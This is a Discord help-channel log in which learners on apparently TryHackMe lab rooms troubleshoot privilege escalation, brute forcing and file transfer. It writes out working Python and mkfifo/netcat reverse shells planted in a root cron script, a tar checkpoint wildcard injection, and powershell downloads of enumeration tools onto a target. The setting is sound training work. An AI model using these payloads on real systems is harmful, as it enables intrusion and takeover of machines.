#room-hints

Hello all, I'm stuck in the Jr. Pen testing room on the Authentication Bypass, task 3. I can't get the ffuf to work correctly to get the password. Any tips?

AgentSudo question. I how do I steg the images? I have exiftool installed on my mac, but idk what I'm doing with it.

I just did some reading, looks like I'm using the wrong tool.

Depends what you're trying to extract

steghide is usually what you'll end up using, although there is a whole room on steganography on THM if you want to learn about some other tools

yeah I was going to mention steghide

Hi. In The room "Windows Event Logs" Task 2 Question:
Filter on Event ID 4104. What was the 2nd command executed in the PowerShell session? --) I cant find this answer. Where can I find it? Thanks for the help in advance 🙂

you still not having much luck?4

Hi Team
I could not find Flags after clicking on the website link provided
Room : Walking An Application - Jr. Penetration Tester
Viewing the page source I could not find the answers to the questions
please help me on this

I found answers myself

@inland cargo wanna gimme another hint about priv ESC

Sure thing. One sec, lemme get my notes.

Let's goooo, check privileges of the user by whoami /priv

looool thanks

Gave +1 Rep to @inland cargo

ill try that in a bit

even tho the machine says treat it like a real test, i have not. BUT i have learnt alot

regardless

Hello everyone, anyone able to help me?
I'm on Cross-site Scripting room on task #3 and I don't understand this question and thus can't answer it, maybe I'm missing something...

"Where in an URL is a good place to test for reflected XSS?"

Hey 🙂
Read the instructions very carefully!! It is mentioned several times 😉

right looking at this, i saw this in my winpeas lmao but i thought you had to have metasploit to do any token impersonation

i presume i was wrong

gonna try that method

Not everything is needed to be done through metasploit. Find the exploit online (GitHub) and execute it 😏

is it by any chance

juicy potato

🖨️

LETS GOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO

Had fun?

also

YES, but fr i learnt alot

tysm

@inland cargo tysm

why wont it give you rep

thanks

Gave +1 Rep to @inland cargo

ah there we go

I think I read everything like a thousand times ^^
Only occurs to me "Query String" or I'm not understanding the question correctly...
Edit: Got it, nvm. Thanks

hello! Im on Kenobi

i tried copying the id_rsa on kenobi to a newly created id_rsa that i left empy

empty*

here it is showing that it was successful. i said put it in var/tmp/id_rsa

but when I open id_rsa, nothing is there... am I missing something?

unless the CPTO is still on the machine instead of my tmp

That's likely the issue

yup thats what it was

Does anyone have a hint for the last question in revil-corp?

They also call it sodin

I am also having the same issue . Did you manage to sort it out ?

Hello, i have created a room 10 days ago. And i am waiting for the possibility to became Public. How much time do i have to wait ?

Can't seem to get the brute force to work in Authentication Bypass room I tied ffuf and hydra. This is my hydra command
hydra 10.10.137.106 http-form-post "/customers/login:username=^USER^&password=^PASS^:Invalid" -L valid_usernames.txt -P Downloads/SecLists-master/Passwords/Common-Credentials/10-million-password-list-top-10000.txt -t 10 -w 20 -o hydra.txt

returns with 0 results

Check your valid_usernames.txt . A wordlist in general has to contain the word you want to fuzz in a single line per word without anything else, so if you check your file I highly assume you have status codes, size and so on as well in there.

So I took a look at the text file. There was spaces after the name. Totally should of realized that when I ran it in verbose. There was a lot of space after the name. Some reason didn't register.

Alright, so it's working now?

yep got the answer. At least I got to understand a bit about how to put commands into hydra.

https://tryhackme.com/room/commonlinuxprivesc
unable to get a reverse shell in task 8

what isn't working?

in the crotab exploitation, after every 5 min. the file autoscript.sh will run automatically righ

right

i have added a reverse shell of python in it as the msfvenom one didn't work

but still i am not able to get a shell

what is the command that is run by the job?

*/5 * * * * root /home/user4/Desktop/autoscript.sh

every 5 min. the script should run right ?

the contents f atoscript.sh are

user4@polobox:~/Desktop$ cat autoscript.sh
touch /home/user4/abc.txt
echo "I will automate the process"
bash -i
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.5.249",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

i think you're adding a layer of complexity by trying to call a python oneliner in a bash file - try and do the same thing locally. put your python oneline in a file called "test.sh" and see if you can connect back to your listener

if you can't, then there is something wrong with your code

ok

let me do that

File "/home/toufique/test.py", line 1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.5.249",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
^
SyntaxError: invalid syntax

it's saying invalid syntax

you don't want a .py file, you want a .sh file - you're trying to replicate the conditions on the box, that runs the .sh file with bash

ohhh

wait a second.

yeah! i got a connect

but i didn't got one thing the code is in python and i am running as .sh

???

you're running a bash script but you're calling "python" to run the python command, it's wierd but if it works for you, it works

so given that it works locally, you need to work out what is broken in the remote case. is python available on the box you're targeting? and what is that "bash -i" command doing in autoscript.sh, it just seems to be hanging around?

no no after making it .sh file

then i was able to connect

yeah, i get it

but it's not working on target

machine

yep, so what's the difference? look at the two questions i asked you above

Why are you using that payload btw? The task was guiding you on what to use, right?

i used that too

the unix reverse shell

that isn't working

look at the two questions i asked you above, i think one of those questions will solve your problem

o

ok

Ye, it seems because you append the payload in the file instead of replacing the contents of the file. But just a guess.

right

i think u caught the fault

just explain me one thing that when we try to run a python script we use something like python3 FILENAME

right

but as the file has .sh extension how will it run without python3

in cron

@polar finch Might know that better, I just guessed why the initial payload that's mentioned in the task might not working.

yeah, the problem you're having is that you've left the call to "bash -i" in your script, so the script never makes it to your reverse shell. i was trying to you go through the troubleshooting steps to get there yourself

yeah! i have overwritten the contents of file and now it just contains that python one line

liner

lets see if it works

@polar finch

you can call python or any other binary from a bash script - that's what you're doing when you use the word "python", and then the "-c" flag is to make python execute a command directly rather than intepreting a file. so you're running a .sh script wiht bash, and when bash gets to that line it says "ok, so now i'll invoke python". it's a bit of strange way to do it, and you probably should have stuck with the msfvenom payload mentionned in the room, but if it works, it works.

ok

i got, bash is internally calling python at that line

don't forget to restart your listener, 5 minutes is a long time to wait

yes

i did that

it's not working, let me try with the unix one again

post the contents of your autoscript.sh file

user4@polobox:~/Desktop$ cat autoscript.sh
mkfifo /tmp/ryvtcat; nc 10.9.5.249 8888 0</tmp/ryvtcat | /bin/sh >/tmp/ryvtcat 2>&1; rm /tmp/ryvtcat

ok, usually i wouldn't suggest changning lots of things at once because you're back to square one with troubleshooting, but ok. so that version is not working?

no, i don't think so because 5 min. are done now

i haven't received a connect back

from past 45 min. i am doing this one thing

that payload is the msfvenom payload suggested by the guide, I imagine? what is your listener syntax

nc -nlvp 8888

yes it's the msfvenom one

the machine expired

i need to do again

ok

at this time it should work as i have restarted the machine

also rewrote the contents of file

so this time, go slowly. make a file on the remote machine with your payload, then run it. make sure the payload can connect back just by you running it normally.

ok

when i run manually

it's saying /tmp/ryvtcat file exists

permission denied

the first line is ok, you're getting permission denied because it isn't executable i imagine. chmod +x yourfile

@polar finchcan i dm you something ?

its about

file inclusion room

first challenge

maybe in a bit, i just want to see if payload10 can sort out thier problem

ok ty ^^

i am unable to get a reverse shell manually also

the script is executing but i am not getting connect

ok, i copied your payload onto a local machine and it works for me. do you have the right IP address?

yes yes

to make sure no error of IP address i copied the ipaddress from ifconfig command

instead of typing manually

i'm going to launch the box and try your method, locally for me everything is working. how are you connected to the VPN?

sudo openvp VPNNAME

openvpn*

and that is on your virtual machine? not on your host machine?

also, i noticed that i wasn't able to fetch files using python server

i am doing on my kali not on attack box

nor using apache2

yeah i understand, and openvpn is running on your virtual machine, not on the host machine?

i am confused, host meaning

you are saying my local machine

right

so you have your vm, and then you have your actual machine, the maching hosting the VM. is openvpn running on your kali VM, or your actual machine?

my actual machine

that is the problem. you need to be running openvpn on the same machine that makes and receives connections to and from the target

otherwise anything connecting back from the targets to you will fail

i just have kali

and i have the target machine

so you need to run openvpn from your kali machine

yeah! i am running it in my downloads folder

and so i am able to access the machines

of tryhackme

else i wouldn't

I think you have never clarified with each other if he is using a virtual kali machine or an installed kali machine ^^ Just trying to solve that miscommunication about that 😄

yeah i had assumed kali was a VM. so i just ran your payload on the box and everything is working, the fact that you're not able to make any connection back from the target machine sounds like it might be a VPN problem. is the kali machin you're using a virtual machine?

i have installed kali

i am not using the virtual machine actually i was confused between the host and virtual and all those things

no it's actual machine no t a virtual one

i have dual boot

windows + kali

If you enter ifconfig do you only see a tun0 interface or any extra like tun1, tun2 etc?

no no

just tun0

the other is wlan0 and eth0

which is not an issue

and you said that you're not able to make any kind of connection to your machine, right? you tried with a python http server, with apache, and the target can never reach your host machine?

yes yes

i tried extracting the linEnum

using wget

it didn't worked neither with python server not with apache 2

If you are doing curl 10.10.10.10/whoami are you getting a response with your actual tun0 IP ?

wait

let me check

yes

i got response with tun0

well i'm ouf of ideas. i can confirm that your last mkfifo payload works on the box, it really sounds like you're having VPN problems. sorry pal.

ok.

thank you for helping @polar finch

Gave +1 Rep to @polar finch

Try sudo ifconfig tun0 mtu 1200 and then make sure you nc listener is set up correct, with the correct port etc. In case that doesn't solve your issue put the mtu setting back to 1500

ok

I understood the process of crontab @Front

@left thunder

i will try that later

than k you for helping @left thunder

just out of curiosity, have you ever had a reverse shell work over the VPN? is this the first time you've had problems?

Ok? Well that setting has nothing to do with the crontab, it's just to make sure you can receive a rev shell, but ye it's fine if you try later.

yes

this is the first time

can you suggest me a simple machine

where i can get a reverse connect

to confirm everything's working fine

any simple machine on thm

just any walkthrough machine, go back to linux fundamentals and try and connect back to your home machine

ok

after doing ssh into the machine ?

Well ye, the target machine you were actually using for example, you can just manually execute the script to check if you get a connection, so without that you have wait 5 mins

i did already

i am not getting a shell

back

And you ran the mtu command in your terminal that I gave to you before trying it?

no i didn't try that

i will do

first let me confirm using the network services machine whether i am able to get a connect or not

to confirm that everything is fine

i am doing the steel mountain ctf

but after using metasploit

i am getting this output

msf6 exploit(windows/http/rejetto_hfs_exec) > run

[] Started reverse TCP handler on 10.9.5.249:4444
[] Using URL: http://0.0.0.0:8080/22SBNpkjs
[] Local IP: http://192.168.1.102:8080/22SBNpkjs
[] Server started.
[] Sending a malicious request to /
[] Server stopped.
[!] This exploit may require manual cleanup of '%TEMP%\nibQX.vbs' on the target
[*] Exploit completed, but no session was created.
msf6 exploit(windows/http/rejetto_hfs_exec) >

@polar finch

it was the firewall that was troubling

@left thunder is really an elite hacker

@left thunder thank you buddy

Gave +1 Rep to @left thunder

hello im working on task 3 of CompTIA Pentest Gettin' [CA] Certified. do i need to do all the Firefox stuff if i have viral box ? if so do i do it in the viral box it self or on my ow internet google chrome?

the instructions are provided in firefox. so they'd be the easiest to follow. you can likely do them in chrome, but you have have to lookup your own guide

what i was asking can i use firefox thats on kali Linux inside viral box? or do i have to do it on my own browser out side of viral box?

if what im asking make sense. not sure if the question is coming out right

i am working on cracking the hashes and i am trying to find a way to limit the password length to only 4 letters. as in i know the password is 4 letters. here is what I have so far and im having a hard time finding docs to back this up

when i type john --format=bcrypt sha --wordlist=/usr/share/wordlists/rockyou.txt --stdout=4

it says invalid options combination or duplicate option: "--format=bcrypt"

so that has to mean im doing the stdout=4 because --format brcypt is fine

and sha is the file in this example

you can use the attackbox, virtualbox, on your main system.

ok thank you

Gave +1 Rep to @glass eagle

the stdout=X is not used like that. it prints all options to standard out of that length. if you wanted to generate all combinations that are 4 long and write it to a file, then ingest that later you could

$ john --incremental --stdout=3 > 3l.txt
$ wc -l 3l.txt
866,496 (lines) 3l.txt

what if i dont need it to output to a file just simply stop when you find the password, which is 4 char

thank you burpingbeetle

in this case, its not even taking an input file to match, its just generating matching patterns.

so a standard john --format=bcrypt --wordlist=WORDLIST

what is used to let the program know i want to limit my search to only password combinations of 4 letters, let me know if i am trying to do something that is not workable with john

thats what i would do.. but i was trying to look at the single-crack mode. i haven't used that in a while

yeah i was just told for this specific example, bcrypt takes forever, so its good to limit the search

thanks for the help anyway

gimme a few minutes to look at it :p

yeah the example was talking about hashcat with the filter feature, but I would be surprised that john doesnt, but im having a hard time finding that feature

maybe not in the default john, but it's in the bleeding-jumbo extended package

git clone https://github.com/openwall/john -b bleeding-jumbo /opt/john-bleedingjumbo

im finding <N

i see this

<N reject the word unless it is less than N characters long

but i tried like <N or <5, didnt have much success unless simply using it wrong

let me see about git clone

i always keep a copy of bjohn around. it comes with the ssh2john, rar2john, zip2john, unshadow (/etc/shadow) and more

let me take a look

└─$ sudo git clone https://github.com/openwall/john -b bleeding-jumbo /opt/john-bleedingjumbo
[sudo] password for kali:
Cloning into '/opt/john-bleedingjumbo'...
remote: Enumerating objects: 94408, done.
remote: Counting objects: 100% (348/348), done.
remote: Compressing objects: 100% (217/217), done.
remote: Total 94408 (delta 163), reused 247 (delta 131), pack-reused 94060
Receiving objects: 100% (94408/94408), 117.18 MiB | 23.11 MiB/s, done.
Resolving deltas: 100% (74063/74063), done.
Updating files: 100% (1960/1960), done.

here what the output

So you can see i'm not crazy or scamming you:
In the HTR room, task 2, they have you download bjohn https://tryhackme.com/room/johntheripper0

cant I just use bjohn now? says its not a command

oh. i used an alias.
alias bjohn='/opt/john-bleedingjumbo/run/john'

ohh

or whatever directory you set it to. couple differences since it's in a different directory. the potfile is in /opt/john-bleedingjumbo/run/john.pot (instead of ~/.john/

i think youre alittle over my head in the the path and what not. i do get what youre trying to get at but just not in it right now... starting again tomorrow

thanks for the help

np. you'll get to it later. pots are where cracked passwords are saved. you can find them manually instead of using --show. you're welcome

In steel mountain room, we have our target machine architecture as x64, then why are we creating x86 payload with msfvenom

Is that a statement or a question, I'm not too sure about 😄 ?

question

Okay, but what exactly is the question as I don't understand it completely?

see, the thing is, when you get a reverse shell and do sysinfo

the target architecture is x64, ok

but, when we are trying to exploit the unquoted path service at that time we are creating a payload using msfvenom where we are using x86 architecture for creation of payload

stageless

Ok, well in general, x86 programms or payloads most likely can run on a x64 target machine. But a x64 programm or payload most likely can not run on a x86 target machine. So that means you will have more success with getting a shell if you are using a x86 payload. But don't take that as 100% right, that's how I think it works.

ok

but this line is confirmed , that x86 programs ---> win32 + win64 and x64 programs ---> only win64

right

As far as I know, yes. But you might double check that with a google search.

ok

you are right

it works the same way u told.

is there anyone who can give me a hint to do a privilege escalation on internal machine? https://tryhackme.com/room/internal

in steel mountain manual exploitation, when i try to fetch winPEAS at the windows machine using certutil command, it fetches the file but when i do "dir" no file is shown up..

probably, you don't have permissions on that dir, try on Windows\Temp

even after doing that

it isn't extracting

sorry i mean it's extracting, but after that no file is shown uo

i understand, did you try with curl or powershell?

i am currently running a cmd shell on target

how to get into powershell

I don't know, maybe tha machine has some rules to block some connections and downloads

wait one second

but i saw hackersploit video

he has done that and it worked absolutely fine

powershell Invoke-WebRequest “http://<attacker-ip>/resource” -OutFile “C:\Path\to\save\resource”

try with that, change tha path to download the file and your ip

how do i start powershell 😂

what is the command can u help

it's not necesary

ok

you can run that on cmd

and instead of “C:\Path\to\save\resource” i can use a dot to save it in current directory

right

yes

i think so

C:\Windows\Temp>powershell Invoke-WebRequest http://10.9.5.249/PowerUp.ps1 -Outfile .
powershell Invoke-WebRequest http://10.9.5.249/PowerUp.ps1 -Outfile .
Invoke-WebRequest : Access to the path 'C:\Windows\Temp' is denied.
At line:1 char:1

• Invoke-WebRequest http://10.9.5.249/PowerUp.ps1 -Outfile .

•   + CategoryInfo          : NotSpecified: (:) [Invoke-WebRequest], Unauthori 
   zedAccessException
    + FullyQualifiedErrorId : System.UnauthorizedAccessException,Microsoft.Pow 
   erShell.Commands.InvokeWebRequestCommand
  
  
  

C:\Windows\Temp>

try putting the name of the resource

NAME OF RESOURCE is PowerUp.ps1

this is the file i want

ok u mean

dest.

yeah

same issue

mm, maybe you do not have permissions, i don't know

maybe it's the firewall

try mounting a smb server with impacket

😂 see u r going to technical

i am exploiting beginner level machine

XDDDDDDDDD

😆

thank u for helpin @fleet dust

Gave +1 Rep to @fleet dust

you're welcome and I am sorry if i could not help you xD just remember, you can do it

yeah

You'd have to actually specify the file after the output.
Like this:
Invoke-WebRequest -Uri "http://www.contoso.com" -OutFile "C:\path\file"
The same applies to certutil, but with a different syntax

did that too buddy

nothing is working out

and i am running out of ideas

oh shit, I just scrolled up.. Sry. Hmm.. Attack box or own machine?

own

machine

vm?

no

dual boot

kali + windows

Now it is me that is running out of ideas..

vpn connection okay?

yeah! because i saw hackersploit's video

it worked for him fine

absolutely no problem

whereas one file is getting extracted

ASCService.exe

the one that i created using msfvenom to overwrite the file

but winPEAS and PowerUp.exe isn't getting extracted, i mean it get's extracted from my machine successfully, but when i type "dir", no file is shown up.

Steel mountain, right?

So, here it is actually pretty late, but I'll try that out tomorrow myself. Now I'm curious...

yeah, please do try

see the metasploit exploitation worked absolutely fine

try the manual one the last task, ok

I will and let you know about the outcome 🙂

sure.

please, do pin me here, so if i am offline i will get a notification on mobile....

thank you @left thunder

Gave +1 Rep to @left thunder

does anybody have experience crafting hashcat given i know exactly howmany letters are in a password I am trying to crack

i tried this yesterday but im not giving up on this...

im using hashcat -m 3200 hashfile WORDLIST

but i want to specify that its 4 lowercase letters

i tried -1 ?l?l?l?l but that is not correct

im looking at the attackmode currently and seeing if that is the key for my hashcat to tell the program that im using a wordlist and a mask

No idea what your problem was but I saw you said that you have kali dual booted with windows. You do you, just a warning, windows dosent take kindly to being dual booted and it can sometimes mess with kali

I got the room solved using other command.

I don't think so windows create an issue because i have been using it from past 1 year

Which command did you actually use in the end? I used certutil without any issues.. Also Invoke-WebRequest.

I used powersheel -c and then -outfile

¯_(ツ)_/¯

powershell -c wget "http://10.10.118.24/winPEAS.exe" -outfile "winPEAS.exe"

This command.

Interesting.
Main thing is, it got sorted 🙂

Yeah

I needed to make a youtube video so i was in a hurry

As soon as i got the problem solved i created and today my subscription got over.

🤣

😆

hey, in the new cybercrafted room (https://tryhackme.com/room/cybercrafted), when I try to connect to the webserver I get redirected to a domain (http://cybercrafted.thm/) that cannot be found. Could anyone just point me in the right direction?

go to /etc/hosts with a text editor ( eg : nano ) and put under the last line

themachineip (press tab) cybercrafted.thm

thanks man!

npnp

trying to download the flag file for Task 4 of this room., ive typed it out plenty of ways but am getting nothing https://tryhackme.com/room/linuxfundamentalspart3

i don't run the scp command in the python window right? I do that in a separate terminal tab?

or do they just want me to do wget

when you run the python module, that terminal is busy hosting a webserver. you need another terminal

right

i am running the commands in a separate one

i keep getting could not resolve hostname http: name or service not known

so i tried not using the http on the front but still get errors

on the target machine, you'll go the the ~tryhckme directory, then run something like
python3 -m http.server 8000

from your attackbox, you can then
wget http://<MACHINEIP>:8000/<FILE>

ooh ok, so i run the python server while logged in via ssh

the python webserver will show any requests to the site

it looks like i did do that

yeah its showing requests but theyre not working

[21/Nov/2021 16:12:12] code 404, message File not found

yes. you want to exfiltrate data, so you login. host a website making that folder visible.

ok, i am hosting it on the ssh'd machine

ensure you are in the correct folder, and 2, you have the correct filename.

└─$ scp tryhackme@10.10.226.225/home/tryhackme/.flag.txt final.txt
cp: cannot stat 'tryhackme@10.10.226.225/home/tryhackme/.flag.txt': No such file or directory

┌──(kali㉿kali)-[/tmp]
└─$ scp tryhackme@http://10.10.226.225/home/tryhackme/.flag.txt final.txt 1 ⨯
ssh: Could not resolve hostname http: Name or service not known

the server is running in home/tryhackme (where the .flag is)

oh dur i guess i dont have to download the file

you want to CURL or WGET the file. its a website now

i thought they wanted me to download it before cating it

you dont have to, but it's necessary concept to understand

yeah 😩 a lil sleep deprived today. ty for the help

something like:
wget http://10.10.226.225:8000/.flag.txt

ah ok i thought it wanted scp since it was lower down on the lesson. ty

you need a : between the host and the path

ah ok i thought i tried that but probably had something else wrong. ty

so after the 8000?

or the 8000/

@ripe hedge

He was referring that to your scp command, not the wget command

if you run two hydras on a computer, will it slow down the other, cut out my current hydra, or be just fine?

i want to try a couple different usernames and didnt know if it would be a problem if i try each username at the same time

thanks!

this will all be on on vm but i guess i could fire up another vm to run there as well

need hinsts for task6 REDLINE machine

just owner

but no work path

You can make a list of the username you want to try

do you put a comma like -L 1,2?

or -l 1,2. imean

No, you put the usernames in a file and then call the file with hydra -L (file).

note: if its just a username use -l

right so you cant put more than one on -l

I dont really know and i didnt see it, but creating a file is easier tbh

especially when you want to test a higher number of usernames

makes sense

thanks

Don't forget man hydra exist

true but would that have told me that you cant put more than one user in -l

guess ill have to look to figure out!

I believe so

trying to grind through the linux stuff so i can start hackin again

i know it's a good foundation to have

Hi guys

I've done exactly what task 7 (Web application - OWASP TOP 10)says. but its not working out. Ive been on it for almost an hour now. Can anyone help please.

What is not working exactly?

The goal is to register an account with " darren" but i still get account already registered, not what i was expecting

To see this in action go to http://10.10.233.53:8888 and try to register a user name darren, you'll see that user already exists so then try to register a user " darren" and you'll see that you are now logged in and will be able to see the content present only in Darren's account which in our case is the flag that you need to retrieve.

Try restarting the machine and registering darren with a space again

I did

same thing

I'll check the room, one moment

You have to log in on your own with the password you specified after registering the account.

Checked. It works.

Double check that u are registering darren and logging in as darren

sorry i dont quite understand

i will send a video now

@honest wagon please check the video

Nice tunes

Oh, you have quotes there

enter darren not " darren"

Oh u did

live reaction video XD

As far as I saw there is no leading space at all.

That's the idea behind that. A user darren already exists, but as the application seems to not get rid of leading spaces while registering another account, it will deem the user darren (with a leading space) as a different user in the registration process.

@midnight canopy hop in small study room, i'll screenshare if you want

I think i see a space there

yes i made sure i added a single space

started a screenshare in small study room

Mh really, looked to me like there was only a single quote but you deleted that single quote afterwards, but guess my eyes are to messed up already then 😄

@midnight canopy watching?

:3

@midnight canopy so u see, it works

u might have registered another spacedarren already

Spacedarren, out of this world 😄

try darren

two spaces

should still work, just checked

@midnight canopy since that worked, you probably already registered a spacedarren previously, so that account was already taken :3

room reset would have fixed that

Thank you so much @honest wagon #RESPECT

Gave +1 Rep to @honest wagon

Hello all. I'm stuck in the Post-Exploitation Basics room. I'm trying to transfer the loot.zip file from the victim to AttackBot via scp but it keeps asking me for root's password. I've gone into the sshd_config file to remove pwd challenges and yet the problem persists. Any thoughts?

C:\Users\Administrator> scp .\20211122145652_loot.zip root@10.10.54.62:22/roo
t/loot.zip

You are supposed to put the scp command in the machine you attack with, not the one being attacked

Well that's hilarious, isn't it? Ok, in my defense I just tried it on AttackBot and it's still asking for pwd lol

Well dam. I guess if you got to post exploit its maybe time to set up your own vm with linux

I have one but I run into issues with that as well I end up jumping between the two machines

You can get root credentials from your attack box at https://tryhackme.com/my-machine

But you shouldn't need them if you scp from it

scp remote_username@remote_ip:/remote/file.txt /local/directory would be the syntax, and the credentials asked are for remote machine

#empline

Any hints on empline

Got nothing in reconn

linuxprivesc

task 10

what is going on ? I created a file with msfvenom and then moved to the machine using wget

I made the file executable

and then what are these below 2 files about

touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=shell.elf

also, can someone please also explain me what is going on in the crontab

use quotations. and if it doens';t work with touch do echo "" > <FILENAME>

essentially, instead of these being actual files, it tricks tar into thinking they are parameters. so it creates a checkpoint and an action to run when it hits it. so it runs your bad program and continues along it's way

you you use a msfvenom payload, or as local script "exploit.sh", which could give you access in a few lines of bash code

i believe it runs that script every minute. you can use https://crontab.guru/ to help you decode it

Kk

Thank you @glass eagle

Gave +1 Rep to @glass eagle

Hi

need a hint?

Yes?!

he legit sent that message in every channel he had access to

heh. i was afk in this channel only one i saw so far

It said that i needed to do that for verification

nope, you have to do this

!docs verify

The website

get your verification code and talk to the bot

Then i got trolled 😡

...

where'd you see that?

HI

Need help/hint?

im in the redline room task 3 the question asks
Where in the Redline UI can you view information about the Logged in User?
i have red the manual i have went through ever tab and drop down menu. the answer is two words 6 and 11 letters

In which category there is information about the OS, bios, etc.. 🙂

Hello everyone! For Lian_Yu room, am I on the right track by downloading the website's image?

Iirc, no.

what do you mean by "lirc"?

If i remember correctly == iirc

thank you

Gave +1 Rep to @left thunder

thank you

not sure what's the cooldown for the rep, but will thank you again 😄

I'm on cooldown too, otherwise Fluff would get another rep from me 🙂

It's fine, i have plenty

saw "steganography" in the category of the room and thought maybe the picture could be something, even found some zlip using binwalk on it, but I'm not sure if that could be anything valuable

zlib*

There could be still some steg in that room, but the picture you asked for is not the one for that category 🙂

got it, thanks 😄

I've decided I don't know what I'm doing with Metasploit from the Network Services 2 room I was in and not doing well with... so I started the Metasploit room and I feel like I am missing something still.. When running "vulns", it's giving a couple of... vulnerabilities? But what am I looking at, can anyone explain / simplify it for me?

You are looking at the list of hosts that were scanned with the list of vulnerabilities that were identified

For example in your screenshot the host 10.10.224.231 was scanned on october 30 2020 and cve-2017-0143 was found among others

Aka ms17-010 rce in smb

Cool thanks, I was kind of gathering that, but wasn't sure what was going on with the URL's.. when I copied and pasted elsewhere, the links into github returned 404 not found, is that common?

Gave +1 Rep to @honest wagon

Those are reference blogposts

Some of them might be ded.

Microsoft.com should be alive one

That is common for older vulnerabilities

Hmmm ok. So, now I'm kind of seeing how they're broken apart, it's just a bit tough to read. I think I may have copied a big blob over when I pasted it... oops..

As blogs go down with time

Yeah, makes sense.

Awesome, thanks!

Now I'm really able to see what's going on with that blob of text.. why is the room having me "use icecast" when it's the doublepulsar that is being mentioned throughout the vulns response?

Not sure how u ran the scan. But considering they were from 2020

Maybe you didn't detect anything

It was just from the room. No worries, I'll just keep moving 🙂

for the cybercrafted room, are we supposed to fuzz the subdomains?

HI, anyone can give me hint in ICE room? im stuck after nmap

nvm

I could use some help with AOC2, day 11. I'm stuck with SUID bit, I don't know how to get priv esc

https://gtfobins.github.io/gtfobins/bash/
Compare your result from the find command if there is a binary that's also listed on gtfobins to do a priv esc.

okay

yeaah I'm root 😄

you can very likely safely ignore anything from snap as well 🙂

Hi guys, i need some help on room :Wonderland..
I found the ssh login for Alice. Now im trying to escalate my priv.
I found out that i can run a pythonscript (a poem) within there is a module "Import random".
I tried to make another .py script named random in the same location as the poem.py but it keeps giving errors...

Hi 🙂
Try to find out, where the script you're executing searches for import.

"" is the first.. isnt that in the same directory as the file is ?

will look into this.. thanks

Gave +1 Rep to @prime willow

i forgot to mention the path to python3.6 after sudo -u rabbit...

So it worked out?

it worked!! 🙂 now im one step further !! ty

hi i do ICE room, and im stack on task 4
question for exploit suggester

architecture for target ix 64 but service (icecast) is running on 86 and after running
run post/multi/recon/local_exploit_suggester
i only got this one output :/
exploit/windows/local/ms10_092_schelevator

im also using msf6, may be this be a problem why i dont get correct output as expected in question?

i could complete this with a hint where i instead of running post exploit runned search in msf 😦

Might be msf version

I just finished rooting Nax, but the question about the metasploit module does not work with the exploit i used... CVE does match the exploit... checked the writeups and they also use this exploit and mark it as answer.... is there some kind of error? did i do something wrong?

Hello

hey guys, I'm stuck at Skynet - I want to use python3 -m http.server 80 so I can in the end get php reverse shell, but I'm getting "Address already in use"

In the AttackBox?

yeah

The port 80 is used for some service.
Could you use any other port?

IIRC, one of the staff members said that one can stop the service using port 80🤔

I tried to kill the process running at 80 and got disconnected from the box lol

The vnc use port 80, no?

Yeah dont

Use higher port

6969 or something

interesting number selection 😄 I will try

Isn't it 5901?🤔

I've read its 80 for vnc on attackbox

And the fact nck get disconnected confirm it

#room-help message

6969 then

if I put reverse-shell.php in root folder, and I'm running http server @ 6968, I should point to http://<attackbox>:6968/root/reverse-shell.php , right?

You upload the revshell.php directly to the web

yes, I was referring to the part of the url after alertConfigField.php=

hello im having a problem with the last question burp suite task 9 Help! There's an Intruder! my anwser was a’ OR 1=1-- . but having no luck

Your single quote ’ looks different then it should be '

yeah, that looks like an apostrophe

wait

yeah idk what that is lol

But then what about answer tolerance?😄

Well, I guess if you try for sqli it will also have no tolerance about that 😄

lol🤯 thank you

Gave +1 Rep to @left thunder

Not sure what I'm doing wrong here... "Unknown command: jobs."

Sorry, it's the Metasploit room tryhackme.com/room/rpmetasploit

You where running the exploit with the command "exploit" instead of "run -j" therefore you are already inside the meterpreter session. These commands you try to use are meant to be used inside msfconsole itself and not inside the meterpreter session.

O.o Huh... Yeah, my bad, I thought they were listing the commands as =. Hmm, so back out, run as a job.

thank you i tried before i asked for a hint and it didnt work i even checked the spelling three times. now it worked of course, also the ? asks for logged in "user" info not "machine" info. i just think that ? is worded in a strange way

Gave +1 Rep to @midnight anchor

Anyone wanna help nudge me on jpgchat?

I know where I need to be but I can't seem to get it to work.

Good evening, fellow persons. I'm working on the Gatekeeper room and can't get the python fuzzer script to connect, or at least, it gets to 100 and disconnects. I've checked syntax 'til I'm blue and it's correct. It seems others have had the same issue with the python fuzzer script not connecting. Any ideas?

The first shot there is my result, second is the fuzzer code

I know it's not working correctly because it disconnects, but doesn't crash the Gatekeeper exe

I just "hand-fuzzed" it and it did crash the server, so I know the general area, but if anyone knows python well enough to let me know where the code is wrong I'd appreciate the head's up. Thx

i can't see the problem in your code after looking at it for 10 seconds (and I haven't done the box), but your use of try / except is going to trip you up here. Any exception at all that is thrown in your try block is going to lead to you printing "Could not connect". I'd recommend getting a minimal working version before you start adding try / except, otherwise it's easy to trick yourself when you're debugging that the connection is failing when actually you've created a totally different error

Understood, thx

Can somebody help me with roads

road*

Hi everyone, I working on intro to linux part 3; I'm stuck at the crontab part. It's asking when the crontab run on the deploy machine, but I don't seen to find a way to look that up. I tried different sites to find answers, but no luck

cat /etc/crontab

first, thank; now I see 4 cron jobs all on root and have different times; however, the question asks about one crontab; I am a little (maybe more than a little lol) confused.

no idea try send scr

scr is secure copy used for securely sending files between machines. I don't think that would help, but thanks for ur help 🙏

i was lazy to finish screenshot 😄

#913866798284288110

Hello guys!

Please some give me a hint on AGENT SUDO room.

I already got the username for J and C and already got the password from the PNG but I can't seems to get the SSH password for J.
I already brute force with rockyou, nothing😭

Somebody please help

Have you checked the .jpg and .png files thoroughly already?

Yes buddy, to the best of my knowledge😭
I was able to get the Steg password

I'm new to Steg though

Maybe try binwalk too.

Yeah bud, that's what I used early to get some little info I got from the PNG.

exiftool is not returning anything valuable..

Though, I saw a zlib data in the PNG, I diverted it to a file and try to examine it but nothing meaningful too😭

You should try harder on that zib file then.

Thanks bud for the swift response.. will keep trying it😪

Gave +1 Rep to @left thunder

